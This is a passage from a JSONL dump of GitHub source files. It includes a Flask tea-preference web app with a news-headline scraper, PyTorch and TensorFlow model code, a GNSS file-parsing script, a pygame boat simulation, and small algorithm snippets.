사용하는 제품이면,\n # 플러그에 꽂힌 제품들이 언제 사용되는지 보고,\n # 가장 나중에 사용될 제품을 뽑는다.\n candidates = {}\n while True:\n for e in in_plug.keys():\n for j in range(i, k):\n if e == elect[j]: # 중복값 들어오면 작은 값으로 넣는 과정 필요\n candidates[e] = [j, e]\n break\n break\n \n candidates = sorted(candidates.values(), key= lambda x: x[0], reverse=True)\n del in_plug[candidates[0][1]]\n result += 1\n in_plug[elect[i]] = 1 # 플러그에 사용중 표시\n \nprint(result)","repo_name":"Suyeon-B/week04_team","sub_path":"suyeon/Greedy/1700 멀티탭 스케줄링 reretry.py","file_name":"1700 멀티탭 스케줄링 reretry.py","file_ext":"py","file_size_in_byte":1926,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"21873944922","text":"from .fitter import AutoCatFitter\nfrom .predictor import AutoCatPredictor\nfrom .file_io import DataReader\nfrom .scaler import Scaler\nfrom .defaults import BATCH_SIZE\nfrom .base import AutoCatTrain\nimport numpy as np\n\n\nclass AutoCat(object):\n def __init__(self, reference_lib=None):\n self.scaler = Scaler()\n self.metrics = {}\n self.data_r = \"\"\n self.data_len = 0\n self.batch_size = BATCH_SIZE\n self.reference_lib = reference_lib\n\n def fit(\n self, data, optimise_time=3600, weight=False\n ): # if file, expected to have header row\n smiles, targets = self.check_input(data)\n self.scaler.get_params(targets)\n training_params = AutoCatTrain().train_params(targets)\n\n if self.data_r == \"\" or self.data_len <= self.batch_size:\n self.fitter = AutoCatFitter(\n self.scaler,\n training_params=training_params,\n features_file=self.reference_lib,\n )\n else:\n self.fitter = AutoCatFitter(\n self.scaler,\n training_params=training_params,\n features_file=self.reference_lib,\n batch=True,\n data_r=self.data_r,\n batch_size=self.batch_size,\n data_len=self.data_len,\n )\n\n if weight:\n self.fitter.weight_labels(targets)\n\n if optimise_time > 0:\n self.fitter.optimise_search(smiles, targets, time_budget=optimise_time)\n\n self.metrics = self.fitter.fit(smiles, targets)\n return self.metrics\n\n def predict(self, data, smiles_col=0):\n if type(data) == np.ndarray:\n smiles = data\n elif type(data) == str:\n data_r = DataReader(data)\n smiles = data_r.read_smiles(smiles_col=smiles_col)\n\n if self.metrics != {}: # If there is a fitter trained in this AutoCat object\n self.predictor = AutoCatPredictor(features_file=self.reference_lib)\n self.predictor.set_model(self.fitter.get_model())\n\n return self.predictor.predict(smiles, self.scaler)\n\n def save(self, file_path, as_onnx=False):\n file_name = file_path.split(\".\")\n if as_onnx:\n if self.y.shape[1] > 1:\n raise Exception(\"Multiregression models cannot be saved in onnx format\")\n self.fitter.save_model(file_name[0] + \".onnx\", \"onnx\")\n else:\n self.fitter.save_model(file_name[0] + \".cbm\", \"cbm\")\n self.fitter.save_metrics(file_name[0] + \"_metrics.json\")\n self.fitter.save_weights(file_name[0] + \"_weights.json\")\n self.scaler.save(file_name[0] + \"_scaler.json\")\n\n def load(self, file_path):\n self.predictor = AutoCatPredictor(features_file=self.reference_lib)\n file_name = file_path.split(\".\")\n if file_name[-1] == \"onnx\":\n self.predictor.load_onnx(file_path)\n elif file_name[-1] == \"cbm\":\n self.predictor.load_cbm(file_path)\n self.scaler.load(file_name[0] + \"_scaler.json\")\n\n # TO DO save and load training params\n def retrain(self, model_path, data):\n file_name = model_path.split(\".\")\n self.scaler.load(file_name[0] + \"_scaler.json\")\n smiles, targets = self.check_input(data)\n training_params = AutoCatTrain().train_params(targets)\n\n if self.data_r == \"\" or self.data_len <= self.batch_size:\n self.fitter = AutoCatFitter(\n self.scaler,\n training_params=training_params,\n features_file=self.reference_lib,\n )\n else:\n self.fitter = AutoCatFitter(\n self.scaler,\n training_params=training_params,\n features_file=self.reference_lib,\n batch=True,\n data_r=self.data_r,\n batch_size=self.batch_size,\n data_len=self.data_len,\n )\n self.fitter.load_weights(file_name[0] + \"_weights.json\")\n\n self.metrics = self.fitter.fit(smiles, targets, retrain=model_path)\n return self.metrics\n\n def check_input(self, data):\n if type(data) == list:\n self.data_len = len(data[0])\n smiles = data[0]\n targets = data[1]\n\n elif type(data) == str:\n self.data_r = DataReader(data)\n self.data_len = self.data_r.read_length()\n if self.data_len <= self.batch_size:\n smiles, targets = self.data_r.get_fold(0, self.data_len)\n else:\n smiles, targets = self.data_r.get_fold(0, self.batch_size)\n if self.data_len % self.batch_size != 0:\n print(\n \"Warning - training dataset is not a multiple of batch size:\",\n self.batch_size,\n )\n return smiles, targets\n","repo_name":"ersilia-os/autocat-chem","sub_path":"core/io.py","file_name":"io.py","file_ext":"py","file_size_in_byte":4902,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"4986401896","text":"import tensorflow as tf\n\nfrom Caster.utils import shape_utils\n\n\nclass SequenceCrossEntropyLoss(object):\n \"\"\"\n 识别文本序列与标签文本序列的交叉熵损失\n \"\"\"\n def __init__(self,\n sequence_normalize=None,\n sample_normalize=None,\n weight=None):\n\n self._sequence_normalize = sequence_normalize\n self._sample_normalize = sample_normalize\n self._weight = weight\n\n \n def __call__(self, logits, labels, lengths, scope=None):\n \"\"\"\n Args:\n logits: float32 tensor with shape [batch_size, max_time, num_classes]\n labels: int32 tensor with shape [batch_size, max_time]\n lengths: int32 tensor with shape [batch_size]\n \n tf.nn.sparse_softmax_cross_entropy_with_logits:\n A common use case is to have logits and labels of shape [batch_size, num_classes], \n but higher dimensions are supported, in which case the dim-th dimension is assumed \n to be of size num_classes. logits and labels must have the same dtype (either float16, \n float32, or float64).\n \"\"\"\n with tf.name_scope(scope, 'SequenceCrossEntropyLoss', [logits, labels, lengths]):\n # 原始交叉熵损失\n raw_losses = tf.nn.sparse_softmax_cross_entropy_with_logits(\n labels=labels, logits=logits\n )\n batch_size, max_time = shape_utils.combined_static_and_dynamic_shape(labels)\n \n # 计算指定序列长度以内的损失\n mask = tf.less(tf.tile([tf.range(max_time)],[batch_size,1]), tf.expand_dims(lengths,1), name='mask')\n masked_losses = tf.multiply(raw_losses, tf.cast(mask, tf.float32), name='masked_losses') # => [batch_size, max_time]\n row_losses = tf.reduce_sum(masked_losses, 1, name='row_losses') # 序列不同时刻损失值和 [batch_size]\n \n # 损失序列长度归一化\n if self._sequence_normalize:\n loss = tf.truediv(row_losses, tf.cast(tf.maximum(lengths),1),tf.float32, name='seq_normed_losses')\n \n loss = tf.reduce_sum(row_losses)\n \n # 损失batch归一化\n if self._sample_normalize:\n loss = tf.truediv(loss, tf.cast(tf.maximum(batch_size, 1),tf.float32))\n\n # 交叉熵损失权值\n if self._weight:\n loss = loss * self._weight\n return loss\n \n\n\nclass STNRegressionLoss(object):\n \"\"\"\n STN矫正定位网络回归损失(平方损失)\n \"\"\"\n def __init__(self, weight):\n self._weight = weight\n\n\n def __call__(self, prediction, target, scope=None):\n \"\"\"\n Args:\n prediction: float32 tensor with shape [batch_size, 2 * num_control_point]\n target: int32 tensor with shape [batch_size, 2 * num_control_point]\n \"\"\"\n with tf.name_scope(scope, 'STNRegressionLoss', [prediction, target]):\n diff = prediction - target\n losses = tf.reduce_sum(tf.square(diff), axis=1) # 2K维度计算损失和\n loss = tf.reduce_mean(losses, axis=0) # batch维度计算平均损失\n\n # 关键点回归损失权值\n if self._weight:\n loss = loss * self._weight\n return loss\n","repo_name":"ChenCongGit/Caster","sub_path":"model/model/Loss.py","file_name":"Loss.py","file_ext":"py","file_size_in_byte":3362,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"6355932004","text":"\n# Import modules.\nimport os\nimport time\nfrom datetime import date, timedelta\nfrom gnsscal import date2gpswd\nfrom Parsing.support_parsing_functions import parse_file\n\nfilesep = os.sep\n\nstart_time = time.time()\n\n\ndef parse_binary_file(binary_file, exe_dir, model):\n # Obtain directory to file.\n week_number, week_day_number = int(binary_file[:4]), int(binary_file[5])\n binary_dir = model.binary_dir + filesep + str(week_number) + filesep + binary_file\n\n # Determine if the file exists within binary_dir. Otherwise, return an error.\n if model.reduced:\n success, msg = parse_file(binary_dir, model.CSV_dir, exe_dir, model.PRNs_to_parse, week_number,\n week_day_number, time_range=model.set_time_range, start_time=model.time_start_value,\n end_time=model.time_end_value)\n if not success:\n return False, msg\n if model.raw:\n success, msg = parse_file(binary_dir, model.CSV_dir, exe_dir, model.PRNs_to_parse, week_number,\n week_day_number, reduced_or_raw='raw', time_range=model.set_time_range,\n start_time=model.time_start_value, end_time=model.time_end_value)\n if not success:\n return False, msg\n return True, 'Success'\n\n\n# ----------- PARSING (NovAtel receivers only) ------------ #\ndef run_parsing(model, exe_dir):\n # Process the dates. Obtain the names of the binary files.\n start_year, start_month, start_day = model.start_date\n end_year, end_month, end_day = model.end_date\n number_of_days = (date(end_year, end_month, end_day) - date(start_year, start_month, start_day)).days\n if number_of_days < 0:\n print('Error: The selected end date must be after the start date.')\n days = [date(start_year, start_month, start_day) + timedelta(days=i) for i in range(number_of_days + 1)]\n binary_files = [str(date2gpswd(day)[0]) + '_' + str(date2gpswd(day)[1]) + '_00_' + model.receiver_name + '.GPS' for\n day in days]\n\n # Parse the binary files.\n for binary_file in binary_files:\n\n # Parse file.\n success, error = parse_binary_file(binary_file, exe_dir, model)\n if not success:\n print(error)\n","repo_name":"nicolasgapa/EISA","sub_path":"EISA-master/Parsing/parsing.py","file_name":"parsing.py","file_ext":"py","file_size_in_byte":2267,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"6412405868","text":"import pygame.display\nfrom math import sin, cos, radians, copysign\n\n\nclass Boat:\n def __init__(self, pos_x, pos_y):\n self.pos_x = pos_x\n self.pos_y = pos_y\n self.vel = 10\n self.heading = 90\n self.rudder = 0\n self.turn = 0\n\n self.length = 100\n self.width = 38\n\n self.boat_img = pygame.image.load('assets/boat_sprite.png')\n self.boat_img = pygame.transform.smoothscale(self.boat_img, (self.length, self.width))\n\n self.water_img_width = 450\n self.water_img_height = 450\n self.water_img = pygame.image.load('assets/water_sprite.jpg')\n self.water_img = pygame.transform.scale(self.water_img, (self.water_img_width, self.water_img_height))\n\n def update(self):\n self.heading = self.heading % 360\n\n max_rudder = 50\n max_vel = 40\n\n if self.rudder > max_rudder:\n self.rudder = max_rudder\n elif self.rudder < -max_rudder:\n self.rudder = -max_rudder\n\n if self.vel > max_vel:\n self.vel = max_vel\n elif self.vel < 0:\n self.vel = 0\n\n self.move()\n\n max_width = pygame.display.Info().current_w\n max_height = pygame.display.Info().current_h\n if self.pos_x > max_width:\n self.pos_x = 0\n if self.pos_x < 0:\n self.pos_x = max_width\n if self.pos_y > max_height:\n self.pos_y = 0\n if self.pos_y < 0:\n self.pos_y = max_height\n\n def move(self):\n self.turn += copysign(self.rudder ** 2, self.rudder) / 200\n\n if self.turn > 50:\n self.turn = 50\n elif self.turn < -50:\n self.turn = -50\n\n self.turn = self.turn * min((self.vel / 200 + 0.90), 0.95)\n\n if self.vel == 0:\n self.turn = 0\n\n self.heading += self.turn / ((self.vel + 10) * 4)\n self.turn = self.turn * 0.95\n\n self.pos_x = self.pos_x + self.vel * cos(radians(self.heading)) / 10\n self.pos_y = self.pos_y - self.vel * sin(radians(self.heading)) / 10\n","repo_name":"AleksanderZawisza/Fuzzy-Boat","sub_path":"app/boat.py","file_name":"boat.py","file_ext":"py","file_size_in_byte":2064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"23070263146","text":"import os\nfrom forms import InfoForm, AddTeaForm\n\nfrom flask import Flask, request, render_template, flash, session, redirect, url_for, session\n\nfrom wtforms.validators import DataRequired\nimport shutil\nimport requests\nfrom datetime import datetime\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_migrate import Migrate\nfrom validate_email import validate_email\nimport csv\nimport re\nfrom bs4 import BeautifulSoup\nfrom flask_restful import Api,Resource\n\n\n# This grabs our directory\nbasedir = os.path.abspath(os.path.dirname(__file__))\n\napp = Flask(__name__)\n# Key for Forms\napp.config['SECRET_KEY'] = 'mysecretkey'\n\n# Connects our Flask App to our Database\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///' + os.path.join(basedir, 'data.sqlite')\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n\n# create sqlite db \ndb = SQLAlchemy(app)\n# Add on migration capabilities in order to run terminal commands\nMigrate(app,db)\napi = Api(app)\n\n###################################\n# MODELS\n# it inherit from db.Model class\nclass User(db.Model):\n\n # The default table name will be the class name\n __tablename__ = 'User'\n\n ## CREATE THE COLUMNS FOR THE TABLE \n # Primary Key column, unique id for each user\n id = db.Column(db.Integer,primary_key=True)\n # Username\n username = db.Column(db.Text)\n # User email\n email = db.Column(db.Text)\n\n # This is a one-to-one relationship\n # A user can have only one fav type of tea\n tea = db.relationship('Tea',backref='user',uselist=False)\n\n # This sets what an instance in this table \n def __init__(self,username,email):\n self.username = username\n self.email = email\n\n def json(self):\n return {'username': self.username, 'email': self.email }\n\n def __repr__(self):\n if self.tea:\n # This is the string representation of a user in the model\n return f\"User {self.username}'s email' is {self.email}, user ID:{self.id}, his/her fav tea is {self.tea.tea_choice}\"\n else:\n return f\"User {self.username}'s email' is {self.email}, user ID:{self.id}, no tea yet.\"\n \n def report_tea(self):\n print(\"Here is my fav tea!\")\n print(self.tea) \n \n\nclass Tea(db.Model):\n\n # The default table name will be the class name\n __tablename__ = 'Tea'\n\n ## CREATE THE COLUMNS FOR THE TABLE \n # Primary Key column, unique id for each user\n id = db.Column(db.Integer,primary_key=True)\n # Username\n temperature = db.Column(db.Text)\n # User email\n tea_choice = db.Column(db.Text)\n\n # Connect the tea to the user that owns it.\n user_id = db.Column(db.Integer,db.ForeignKey('User.id'))\n\n # This sets what an instance in this table \n def __init__(self,temperature,tea_choice,user_id):\n self.temperature = temperature\n self.tea_choice = tea_choice\n self.user_id = user_id\n\n def json(self):\n return {'temperature': self.temperature, 'tea_choice': self.tea_choice, 'user_id': self.user_id,}\n\n def __repr__(self):\n # This is the string representation of a tea in the model\n if self.user_id:\n return f\"Tea {self.tea_choice}'s temperature is {self.temperature}, ID:{self.id}, user is {self.user_id}\"\n else:\n return f\"Tea {self.tea_choice}'s temperature is {self.temperature}, ID:{self.id}, no users yet\"\n\n\n\nproxies = {'http' : 'http://10.10.0.0:0000', \n 'https': 'http://120.10.0.0:0000'}\n\n# library to generate user agent\nfrom user_agent import generate_user_agent\n\nurl='https://www.nytimes.com/'\n\n# generate a user agent\nheaders = {'User-Agent': generate_user_agent(device_type=\"desktop\", os=('mac', 'linux'))}\n#headers = {'User-Agent': 'Mozilla/5.0 (X11; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.63 Safari/537.36'}\npage_response = requests.get(url, timeout=5, headers=headers)\n\n\n# website scraping\ntitles_list = []\n\n\ndef scraper():\n try:\n data = requests.get(url, timeout=5)\n if page_response.status_code == 200:\n\n html = BeautifulSoup(data.text, 'html.parser')\n\n titles = html.select('h2 span')\n\n try:\n for title in titles:\n titles_list.append(title.string)\n\n except IndexError:\n return 'No matching element found.' \n\n\n # write titles_list into csv file\n with open('index.csv', 'a') as csv_file:\n writer = csv.writer(csv_file)\n writer.writerow([titles_list, datetime.now()])\n else:\n print(page_response.status_code)\n # notify, try again\n except requests.Timeout as e:\n print(\"It is time to timeout\")\n print(str(e))\n return titles_list \n\nscraper()\n\n\n@app.route('/tea_form', methods=['GET', 'POST'])\ndef tea():\n # Create instance of the form.\n form = InfoForm()\n \n # Grab the data from the breed on the form.\n if form.validate_on_submit(): \n session['temperature'] = form.temperature.data\n session['tea_choice'] = form.tea_choice.data\n\n flash(f\"You just changed your tea_choice to: {session['tea_choice']}\")\n\n return redirect(url_for(\"thankyou\"))\n\n return render_template('tea.html', form=form)\n\n@app.route('/add_tea', methods=['GET', 'POST'])\ndef add_tea():\n # Create instance of the form.\n form = AddTeaForm()\n \n # Grab the data from the breed on the form.\n if form.validate_on_submit(): \n temperature = form.temperature.data\n tea_choice = form.tea_choice.data\n user_id = User.query.first().id\n \n # Add new tea to DB\n new_tea = Tea(temperature,tea_choice,user_id)\n db.session.add(new_tea)\n db.session.commit()\n\n\n return redirect(url_for(\"list_tea\"))\n\n return render_template('add_tea.html', form=form)\n\n@app.route('/userslist')\ndef list_user():\n # Grab a list of users from database.\n users = User.query.all()\n return render_template('userslist.html', users=users)\n\n@app.route('/tealist')\ndef list_tea():\n # Grab a list of tea from database.\n tea = Tea.query.all()\n return render_template('tealist.html', tea=tea)\n\n@app.route('/')\ndef index():\n return render_template('index.html',titles_list=titles_list)\n\n@app.route('/signup_form')\ndef signup_form():\n return render_template('signup_form.html')\n\n@app.route('/thankyou')\ndef thankyou():\n username = request.args.get('username')\n \n return render_template('thankyou.html',username=username)\n\n@app.route('/cn/<name>')\ndef cn(name):\n return render_template('chinese.html',name=name)\n\n\n@app.route('/report')\ndef report(): \n username = request.args.get('username')\n email = request.args.get('email')\n\n lower_letter = False\n upper_letter = False\n num_end = False\n validatedemail = False\n\n if (username and email):\n lower_letter = any(letter.islower() for letter in username)\n upper_letter = any(letter.isupper() for letter in username)\n num_end = username[-1].isdigit()\n validatedemail = validate_email(email)\n\n report = lower_letter and upper_letter and num_end and validatedemail\n \n if report:\n # if user info is validated, pass it to DB\n new_user = User(username, email)\n db.session.add(new_user)\n db.session.commit()\n\n return render_template('report.html',\n username=username,report=report,\n lower_letter=lower_letter,\n upper_letter=upper_letter,\n num_end=num_end,\n validatedemail = validatedemail)\n else:\n return redirect(url_for('index'))\n\n@app.route('/user/<name>')\ndef user(name):\n return '<h1>This is a page for {}<h1>'.format(name.upper())\n\n@app.errorhandler(404)\ndef page_not_found(e):\n return render_template('404.html'),404\n\nclass AllTea(Resource):\n\n def get(self):\n tea = Tea.query.all()\n\n if tea:\n # return json of teas\n return [t.json() for t in tea]\n else:\n return {'tea_choice':'not found'}, 404\n\n\nclass AllUsers(Resource):\n\n def get(self):\n users = User.query.all()\n\n if users:\n # return json of users\n return [user.json() for user in users]\n else:\n return {'username':'not found'}, 404\n\napi.add_resource(AllTea,'/teas')\napi.add_resource(AllUsers,'/users')\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"AbbyBiying/Tea-Time","sub_path":"basic.py","file_name":"basic.py","file_ext":"py","file_size_in_byte":8427,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"71100509447","text":"import random\n\ndef binary_search(L, t, low, high):\n while low <= high:\n mid = (low + high) // 2\n if L[mid] == t:\n return True\n elif L[mid] < t:\n low = mid + 1\n else:\n high = mid - 1\n return False\n\n\nif __name__ == \"__main__\":\n L = [random.randint(0,30) for _ in range(20)]\n L.sort()\n\n print(L)\n print(binary_search(L, 14, 0, len(L)-1))","repo_name":"douzujun/Python-Foundation-Suda","sub_path":"上机题目和面试题整理/Python-Foundation-Suda-master/02_MOOC习题/04_2二分查找.py","file_name":"04_2二分查找.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","stars":51,"dataset":"github-code","pt":"16"} +{"seq_id":"36467695351","text":"# -*- coding:utf-8 -*-\nfrom celery import Celery\n\n\napp = Celery('tasks')\n\napp.config_from_object(\"celeryconfig\")\n\n\n\n@app.task\ndef add(x, y):\n return x + y\n\n@app.task\ndef error_handler(uuid):\n result = AsyncResult(uuid)\n exc = result.get(propagate=False)\n print('Task {0} raised exception: {1!r}\\n{2!r}'.format(\n uuid, exc, result.traceback))","repo_name":"ShichaoMa/old-spider","sub_path":"test/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"25013360527","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Mar 8 21:30:29 2019\r\n\r\n@author: Vincent\r\n\"\"\"\r\n\r\nfrom __future__ import print_function\r\nimport torch\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom scipy.stats import zscore\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\nfrom sklearn.model_selection import train_test_split\r\nfrom torch.utils.data import DataLoader\r\nimport cv2 as cv\r\nimport matplotlib.pyplot as plt\r\nfrom torchvision.models import vgg\r\n\r\n#either uses GPU or CPU, depending if cuda is available\r\ndevice = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\r\n\r\n#the neural networks we are testing\r\nclass Net1(nn.Module):\r\n \r\n def __init__(self, num_classes=10):\r\n super(Net1, self).__init__()\r\n self.layer1 = nn.Sequential(\r\n nn.Conv2d(1, 16, kernel_size=4, stride=1, padding=2),\r\n nn.BatchNorm2d(200),\r\n nn.ReLU(),\r\n nn.MaxPool2d(kernel_size=2, stride=2))\r\n self.layer2 = nn.Sequential(\r\n nn.Conv2d(16, 32, kernel_size=4, stride=1, padding=2),\r\n nn.BatchNorm2d(50),\r\n nn.ReLU(),\r\n nn.MaxPool2d(kernel_size=2, stride=2))\r\n self.fc = nn.Linear(50*17*17, num_classes)\r\n \r\n def forward(self, x):\r\n out = self.layer1(x)\r\n #print(out.shape)\r\n out = self.layer2(out)\r\n #print(out.shape)\r\n out = out.reshape(-1, 50*17*17)\r\n out = self.fc(out)\r\n return out\r\n\r\nclass Net2(nn.Module):\r\n def __init__(self, num_classes=10):\r\n super(Net2, self).__init__()\r\n self.layer1 = nn.Sequential(\r\n nn.Conv2d(in_channels=1, out_channels=16, kernel_size=4, padding=1, stride=1),\r\n nn.Dropout(p=0.5),\r\n nn.ReLU(),\r\n nn.MaxPool2d(2,2))\r\n self.layer2 = nn.Sequential(\r\n nn.Conv2d(in_channels=16, out_channels=32, kernel_size=4, padding=1, stride=1),\r\n nn.Dropout(p=0.5),\r\n nn.ReLU(),\r\n nn.MaxPool2d(2,2))\r\n self.layer3 = nn.Sequential(\r\n nn.Conv2d(in_channels=32, out_channels=64, kernel_size=4, padding=1, stride=1),\r\n nn.Dropout(p=0.5),\r\n nn.ReLU(),\r\n nn.MaxPool2d(2,2))\r\n self.layer4 = nn.Sequential(\r\n nn.Conv2d(in_channels=64, out_channels=128, kernel_size=4, padding=1, stride=1),\r\n nn.Dropout(p=0.5),\r\n nn.ReLU(),\r\n nn.MaxPool2d(2,2)) \r\n self.layer5 = nn.Sequential(\r\n nn.Conv2d(in_channels=128, out_channels=256, kernel_size=4, padding=1, stride=1),\r\n nn.Dropout(p=0.5),\r\n nn.ReLU(),\r\n nn.MaxPool2d(2,2)) \r\n self.fc = nn.Linear(256, num_classes)\r\n \r\n def forward(self, x):\r\n in_size=x.size(0)\r\n out = self.layer1(x)\r\n #print(out.shape)\r\n out = self.layer2(out)\r\n #print(out.shape)\r\n out = self.layer3(out)\r\n #print(out.shape)\r\n out = self.layer4(out)\r\n #print(out.shape)\r\n out = self.layer5(out)\r\n #print(out.shape)\r\n out = out.view(in_size, -1)\r\n out = self.fc(out)\r\n return out\r\n\r\nclass Net3(nn.Module):\r\n def __init__(self, num_classes=10):\r\n super(Net3, self).__init__()\r\n self.layer1 = nn.Sequential(\r\n nn.Conv2d(in_channels=1, out_channels=16, kernel_size=4, padding=2, stride=1),\r\n nn.Dropout(p=0.5),\r\n nn.ReLU(),\r\n nn.MaxPool2d(2,2))\r\n self.layer2 = nn.Sequential(\r\n nn.Conv2d(in_channels=16, out_channels=32, kernel_size=4, padding=2, stride=1),\r\n nn.Dropout(p=0.5),\r\n nn.ReLU(),\r\n nn.MaxPool2d(2,2))\r\n self.layer3 = nn.Sequential(\r\n nn.Conv2d(in_channels=32, out_channels=64, kernel_size=4, padding=2, stride=1),\r\n nn.Dropout(p=0.5),\r\n nn.ReLU(),\r\n nn.MaxPool2d(2,2))\r\n self.layer4 = nn.Sequential(\r\n nn.Conv2d(in_channels=64, out_channels=128, kernel_size=4, padding=2, stride=1),\r\n nn.Dropout(p=0.5),\r\n nn.ReLU(),\r\n nn.MaxPool2d(2,2)) \r\n self.layer5 = nn.Sequential(\r\n nn.Conv2d(in_channels=128, out_channels=256, kernel_size=4, padding=2, stride=1),\r\n nn.Dropout(p=0.5),\r\n nn.ReLU(),\r\n nn.MaxPool2d(2,2)) \r\n self.layer6 = nn.Sequential(\r\n nn.Conv2d(in_channels=256, out_channels=128, kernel_size=4, padding=2, stride=1),\r\n nn.Dropout(p=0.5),\r\n nn.ReLU(),\r\n nn.MaxPool2d(2,2)) \r\n self.fc1 = nn.Linear(128, 128)\r\n self.fc2 = nn.Linear(128, num_classes)\r\n \r\n def forward(self, x):\r\n in_size=x.size(0)\r\n out = self.layer1(x)\r\n #print(out.shape)\r\n out = self.layer2(out)\r\n #print(out.shape)\r\n out = self.layer3(out)\r\n #print(out.shape)\r\n out = self.layer4(out)\r\n #print(out.shape)\r\n out = self.layer5(out)\r\n #print(out.shape)\r\n out = self.layer6(out)\r\n #print(out.shape)\r\n out = out.view(in_size, -1)\r\n out = self.fc1(out)\r\n out = self.fc2(out)\r\n return out\r\n \r\n#A custom dataset for our images and labels\r\nclass CustomDataset(torch.utils.data.Dataset):\r\n def __init__(self, X_tensor, y_tensor):\r\n self.X_tensor = X_tensor\r\n self.y_tensor = y_tensor\r\n return\r\n def __getitem__(self, index):\r\n self.img = self.X_tensor[index]\r\n label = self.y_tensor[index]\r\n return (self.img,label)\r\n def __len__(self):\r\n return self.X_tensor.size()[0]\r\n\r\n#function that preproceses our images\r\ndef preprocess(images):\r\n \r\n images = images/255\r\n images[images < 0.90] = 0\r\n images[images > 0] = 1\r\n \r\n for i in range(len(images)):\r\n \r\n image = images[i] \r\n image=np.array(image, dtype='uint8') \r\n \r\n contours,_ = cv.findContours(image, cv.RETR_EXTERNAL, cv.CHAIN_APPROX_NONE)\r\n \r\n largest_area = 0\r\n for contour in contours:\r\n \r\n coor1, coor2, width, height = cv.boundingRect(contour)\r\n \r\n side = max(width, height)\r\n \r\n area = side * side\r\n \r\n if area > largest_area:\r\n largest_area = area\r\n larC1, larC2, larW, larH = coor1, coor2, width, height\r\n \r\n \r\n largest_digit = image[larC2:larC2+larH,larC1:larC1+larW]\r\n \r\n [rows,cols] = largest_digit.shape\r\n if rows>cols:\r\n difference = rows - cols\r\n if difference%2 !=0:\r\n difference += 1 \r\n image = np.concatenate((np.zeros((rows,int(difference/2))),largest_digit,np.zeros((rows,int(difference/2)))), axis=1)\r\n elif rows<cols:\r\n difference = cols - rows\r\n if difference%2 !=0:\r\n difference += 1 \r\n image = np.concatenate((np.zeros((int(difference/2),cols)),largest_digit,np.zeros((int(difference/2),cols))), axis=0)\r\n else:\r\n image = largest_digit\r\n \r\n image = cv.resize(image,(64, 64), interpolation = cv.INTER_AREA)\r\n images[i] = image\r\n \r\n return images\r\n\r\n#builds the dataloaders for our images and labels\r\ndef build_loaders():\r\n \r\n train_images = pd.read_pickle('train_images.pkl')\r\n train_labels = pd.read_csv('train_labels.csv')\r\n\r\n '''\r\n img_idx = 3\r\n plt.title('Label: {}'.format(train_labels.iloc[img_idx]['Category']))\r\n plt.imshow(train_images[img_idx])\r\n '''\r\n\r\n train_images = preprocess(train_images)\r\n \r\n '''\r\n img_idx = 17\r\n plt.title('Label: {}'.format(train_labels.iloc[img_idx]['Category']))\r\n plt.imshow(train_images[img_idx]) \r\n '''\r\n \r\n train_images = train_images.reshape((40000,1,64,64))\r\n \r\n #Pre-Process the csv-files of the labels \r\n train_labels = train_labels.drop(['Id'], axis=1)\r\n train_labels = train_labels.values\r\n train_labels = np.reshape(train_labels, (-1))\r\n\r\n X_train, X_test, y_train, y_test = train_test_split(train_images, train_labels, test_size=0.10, random_state=2)\r\n #X_test, X_rem, y_test, y_rem = train_test_split(X_test, y_test, test_size=0.90, random_state=2)\r\n \r\n X_tensor_train = torch.tensor(X_train)\r\n y_tensor_train = torch.tensor(y_train)\r\n X_tensor_test = torch.tensor(X_test)\r\n y_tensor_test = torch.tensor(y_test)\r\n\r\n train_dataset = CustomDataset(X_tensor_train, y_tensor_train)\r\n test_dataset = CustomDataset(X_tensor_test, y_tensor_test)\r\n\r\n train_loader = torch.utils.data.DataLoader(dataset=train_dataset,batch_size=2, shuffle=True)\r\n test_loader = torch.utils.data.DataLoader(dataset=test_dataset,batch_size=2, shuffle=True)\r\n \r\n return train_loader, test_loader, X_tensor_test, y_tensor_test\r\n\r\n#function that predicts the label for every image in the test set. Returns a\r\n#panda dataframe\r\ndef predictTest():\r\n \r\n test_images = pd.read_pickle('test_images.pkl')\r\n \r\n img_idx = 4\r\n plt.imshow(test_images[img_idx])\r\n \r\n test_images = preprocess(test_images)\r\n test_images = test_images.reshape(10000,1,64,64)\r\n test_images = torch.tensor(test_images)\r\n \r\n predicted = np.zeros((len(test_images)))\r\n for i in range(len(test_images)):\r\n image = test_images[i,:,:,:]\r\n image = image.reshape(1,1,64,64)\r\n output = net(image)\r\n _, predicted[i] = torch.max(output.data, 1)\r\n \r\n predicted = predicted.astype(int)\r\n dataframe = pd.DataFrame({'Category':predicted})\r\n dataframe.to_csv(\"submission.csv\")\r\n \r\n return predicted\r\n \r\n#loop that runs the adam algorithm\r\ndef makeItLearn(epoch, best_model_accuracy):\r\n \r\n optimizer = torch.optim.Adam(net.parameters(), lr=learning_rate, weight_decay = 0)\r\n \r\n #for each batch, update the weights, using the Adam Algorithm \r\n total_step = len(train_loader)\r\n for i, (images, labels) in enumerate(train_loader):\r\n \r\n images = images.to(device)\r\n labels = labels.to(device)\r\n optimizer.zero_grad() # zero the gradient buffers\r\n output = net(images)\r\n loss = cross_entropy(output, labels)\r\n loss.backward()\r\n optimizer.step()\r\n \r\n #prints the loss\r\n if (i+1) % 10 == 0:\r\n print ('Epoch [{}/{}], 